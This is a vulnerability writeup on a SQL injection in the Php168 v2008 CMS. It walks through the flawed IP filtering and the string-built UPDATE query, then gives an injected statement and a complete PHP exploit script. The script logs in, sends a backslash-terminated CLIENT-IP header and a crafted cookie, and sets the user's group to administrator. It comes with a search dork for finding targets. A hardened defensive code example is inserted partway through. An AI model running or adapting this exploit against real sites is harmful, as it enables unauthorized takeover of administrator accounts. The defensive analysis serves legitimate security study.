
Php168 v2008 Privilege Escalation Vulnerability


http://www.gipsky.com/
by Ryat

http://www.wolvez.org

2009-01-25

A brief analysis of this vulnerability.



PHP code (common.inc.php):

```php
// common.inc.php
if($_SERVER['HTTP_CLIENT_IP']){
    $onlineip=$_SERVER['HTTP_CLIENT_IP'];
}elseif($_SERVER['HTTP_X_FORWARDED_FOR']){
    $onlineip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
    $onlineip=$_SERVER['REMOTE_ADDR'];
}
// the "+" quantifier was lost in the page's rendering and is restored here
$onlineip = preg_replace("/^([\d\.]+).*/", "\\1", filtrate($onlineip));
// Using preg_replace here is a security risk: a vulnerability was reported at this spot before,
// and the vendor's fix was to pass $onlineip through the filtrate function.
```

Let's look at what the filtrate function actually does:



PHP code (function.inc.php):

```php
// function.inc.php
// The replacement strings are HTML entities; the page's rendering decoded them back
// into the original characters. They are restored here for &, ", ', < and >, which is
// what the text below refers to. The whitespace replacements are shown as rendered.
function filtrate($msg){
    $msg = str_replace('&','&amp;',$msg);
    $msg = str_replace(' ',' ',$msg);
    $msg = str_replace('"','&quot;',$msg);
    $msg = str_replace("'",'&#39;',$msg);
    $msg = str_replace("<","&lt;",$msg);
    $msg = str_replace(">","&gt;",$msg);
    $msg = str_replace("\t"," ",$msg);
    $msg = str_replace("\r","",$msg);
    $msg = str_replace(" "," ",$msg);
    return $msg;
}
```

It escapes ', ", < and the like, but does nothing with the backslash (\). Since the function only converts characters to HTML entities, a backslash passes through untouched and can still escape a quote inside an SQL string literal.



PHP code (common.inc.php):

```php
// common.inc.php
if($usr_oltime>30||!$usr_oltime){
    $usr_oltime>600 && $usr_oltime=600;
    include(PHP168_PATH."php168/level.php");
    if( isset($memberlevel[$lfjdb[groupid]]) ){
        $SQL=",groupid=8";
        $lfjdb[money]=get_money($lfjuid);
        foreach( $memberlevel AS $key=>$value){
            if($lfjdb[money]>=$value){
                $SQL=",groupid=$key";
            }
        }
    }else{
        $SQL="";
    }
    // "oltime+": the "+" was lost in the page's rendering and is restored here
    $db->query("UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='$onlineip',oltime=oltime+'$usr_oltime'$SQL WHERE uid='$lfjuid'");
    // Because the query is built by string concatenation, a backslash in $onlineip escapes the
    // quote that should close lastip, and $usr_oltime then becomes the injection point :)
}
```
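As an added defensive example, not part of this writeup and not PHP168's own code: a hardened form of the IP handling and the UPDATE shown above. It assumes a PDO connection `$db`, the same `{$pre}memberdata` column names the page uses, and a list of trusted proxy addresses; `time()` stands in for the page's `$timestamp`, and the sample `$server` array is constructed for the demonstration (all of these are assumptions).

```php
<?php
// Added example (not PHP168's code): hardened replacement for the $onlineip / UPDATE logic.
// Assumes a PDO handle $db, the page's column names, and a trusted-proxy list (assumptions).

// Resolve the client address. Proxy headers are attacker-controlled, so they are only
// honoured when the direct peer is a trusted proxy, and every candidate must parse as an
// IP address or it is discarded. No regex trimming, no HTML-entity "filtering".
function resolve_client_ip(array $server, array $trusted_proxies = []): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    $candidates = [];
    if (in_array($remote, $trusted_proxies, true)) {
        // X-Forwarded-For is a comma-separated chain; the first hop is the client.
        $xff = $server['HTTP_X_FORWARDED_FOR'] ?? '';
        $candidates[] = trim(explode(',', $xff)[0]);
        $candidates[] = $server['HTTP_CLIENT_IP'] ?? '';
    }
    $candidates[] = $remote;
    foreach ($candidates as $ip) {
        if (filter_var($ip, FILTER_VALIDATE_IP) !== false) {
            return $ip;
        }
    }
    return '0.0.0.0';  // unresolvable: store a sentinel rather than raw header text
}

// Whitelist the online-time delta instead of trusting a string in an arithmetic context.
// Anything that is not a plain number collapses to 0; the page's own 600 cap is kept.
function clamp_oltime($usr_oltime): int
{
    if (!is_numeric($usr_oltime)) {
        return 0;
    }
    $t = (int)$usr_oltime;
    return max(0, min($t, 600));
}

// Parameterised UPDATE: bound values can never change the statement's structure, so a
// trailing backslash or a stray quote in any value is just data, not SQL.
function update_member_visit(PDO $db, string $pre, int $uid, string $ip, int $oltime, ?int $groupid = null): int
{
    $sql = "UPDATE {$pre}memberdata SET lastvist = ?, lastip = ?, oltime = oltime + ?";
    $params = [time(), $ip, $oltime];
    if ($groupid !== null) {          // the groupid branch of the page's code, parameterised too
        $sql .= ", groupid = ?";
        $params[] = $groupid;
    }
    $sql .= " WHERE uid = ?";
    $params[] = $uid;
    $stmt = $db->prepare($sql);
    $stmt->execute($params);
    return $stmt->rowCount();
}

// Constructed sample request: a direct (non-proxy) peer sending a bogus CLIENT-IP header
// and a non-numeric USR value. Both inputs are neutralised before any SQL is built.
$server = ['REMOTE_ADDR' => '203.0.113.5', 'HTTP_CLIENT_IP' => 'ryat\\'];
var_dump(resolve_client_ip($server));
var_dump(clamp_oltime("+31,groupid=3"));
var_dump(clamp_oltime("45"));
// update_member_visit($db, 'qb_', 2, resolve_client_ip($server), clamp_oltime("45"));
```

With this layout the header value is rejected by `filter_var` and only `REMOTE_ADDR` is stored, a non-numeric `USR` value clamps to zero, and the prepared statement keeps every value outside the SQL grammar, so nothing depends on filtrate's HTML-entity escaping doubling as SQL escaping.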

Also note that $usr_oltime goes through a simple check first, and the SQL statement still has to remain syntactically valid. Here is the statement I constructed:



The resulting statement (square brackets mark the two injected values; the "+" characters lost in the page's rendering are restored):

```sql
UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='[\]',oltime=oltime+'[+31,groupid=3,introduce=0x70757265745f74 WHERE uid=2#]'$SQL WHERE uid='$lfjuid'
```

Finally, the exploit:



PHP code (exploit):

```php
#!/usr/bin/php
<?php
// Reassembled from the page's split listing; the "+" characters lost in rendering
// ($i++ and the regex quantifiers) are restored.

print_r('
---------------------------------------------------------------------------
Php168 <= v2008 update user access exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168"
---------------------------------------------------------------------------
');
/**
 * works regardless of php.ini settings
 */
if ($argc < 5) {
    print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path user pass
host: target server (ip/hostname)
path: path to php168
user: login username
pass: login password
Example:
php '.$argv[0].' localhost /php168/
---------------------------------------------------------------------------
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];

// first request: log in and capture the passport cookie (the uid is the second capture group)
$resp = send();
preg_match('/Set-Cookie:\s(passport=([0-9]{1,4})+[a-zA-Z0-9%]+)/', $resp, $cookie);

// second request: replay the session with the crafted CLIENT-IP header and USR cookie,
// then check whether the marker written to the introduce field is visible
if ($cookie) {
    if (strpos(send(), 'puret_t') !== false) {
        exit("Exploit Success!\nYou Are Admin Now!\n");
    } else {
        exit("Exploit Failed!\n");
    }
} else {
    exit("Exploit Failed!\n");
}

function rands($length = 8)
{
    $hash = '';
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $max = strlen($chars) - 1;
    mt_srand((double)microtime() * 1000000);
    for ($i = 0; $i < $length; $i++)
        $hash .= $chars[mt_rand(0, $max)];

    return $hash;
}

function send()
{
    global $host, $path, $user, $pass, $cookie;

    if ($cookie) {
        $cookie[1] .= ';USR='.rands()."\t+31,groupid=3,introduce=0x70757265745f74 WHERE uid=$cookie[2]#\t\t";
        $cmd = '';

        $message = "POST ".$path."member/userinfo.php HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "CLIENT-IP: ryat\\\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n";
        $message .= "Cookie: ".$cookie[1]."\r\n\r\n";
        $message .= $cmd;
    } else {
        $cmd = "username=$user&password=$pass&step=2";

        $message = "POST ".$path."login.php HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n\r\n";
        $message .= $cmd;
    }

    $fp = fsockopen($host, 80);
    fputs($fp, $message);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>
```